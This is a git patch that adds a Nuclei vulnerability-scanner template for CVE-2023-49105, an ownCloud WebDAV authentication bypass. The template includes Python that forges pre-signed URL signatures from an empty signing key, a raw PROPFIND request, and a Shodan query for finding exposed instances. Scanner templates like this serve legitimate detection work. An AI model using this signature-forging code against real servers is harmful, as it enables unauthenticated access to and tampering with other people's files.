From 93af58aada6757849aa8f9ff1ec82d38349fc7ea Mon Sep 17 00:00:00 2001
From: chrisusdag <153892655+chrisusdag@users.noreply.github.com>
Date: Fri, 15 Dec 2023 14:48:22 +0100
Subject: [PATCH] CVE-2023-49105 (#8835)

* Create cve-2023-49105.yaml

* Update cve-2023-49105.yaml
---
 code/cves/2023/cve-2023-49105.yaml | 88 ++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 code/cves/2023/cve-2023-49105.yaml

diff --git a/code/cves/2023/cve-2023-49105.yaml b/code/cves/2023/cve-2023-49105.yaml
new file mode 100644
index 0000000000..88fadc7480
--- /dev/null
+++ b/code/cves/2023/cve-2023-49105.yaml
@@ -0,0 +1,88 @@
+id: CVE-2023-49105
+
+info:
+  name: OwnCloud - WebDAV API Authentication Bypass
+  author: ChristianPoeschl,FlorianDewald,usdAG
+  severity: critical
+  description: |
+    An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
+  reference:
+    - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
+    - https://github.com/0xfed/ownedcloud
+    - https://owncloud.org/security
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-49105
+    cwe-id: CWE-287
+    epss-score: 0.00091
+    epss-percentile: 0.38353
+    cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: owncloud
+    product: owncloud
+    shodan-query: title:"owncloud"
+  tags: cve,cve2023,owncloud,code,auth-bypass
+
+variables:
+  username: admin
+
+code:
+  - engine:
+      - py
+      - python3 # requires python to be pre-installed on system running nuclei
+    source: |
+      # build signature for presigned urls
+      import base64, hashlib, datetime, os
+      from urllib.parse import urlencode
+
+      username = os.getenv('username')
+      base_url = os.getenv('BaseURL')
+      dav_url = f'{base_url}/remote.php/dav/files/{username}'
+      oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
+      data = {
+        'OC-Expires': '991200',
+        'OC-Verb': 'PROPFIND',
+        'OC-Credential': username,
+        'OC-Date': oc_date
+      }
+      sig_url = f'{dav_url}?{urlencode(data)}'
+      # derive signature from empty sign key
+      dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
+      final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
+      #final_url = f'{sig_url}&OC-Signature={dk.hex()}'
+      print(final_url)
+
+http:
+  - raw:
+      - |
+        PROPFIND {{code_response}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+        Authorization: Basic {{base64('{{username}}')}}
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        name: bypass-correct-user
+        dsl:
+          - status_code == 207
+          - contains(body, 'owncloud.org')
+        condition: and
+
+      - type: word
+        name: bypass-wrong-user
+        part: body
+        words:
+          - User unknown
+          - Sabre
+          - Exception
+          - NotAuthenticated
+        condition: and
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Username => "+ username'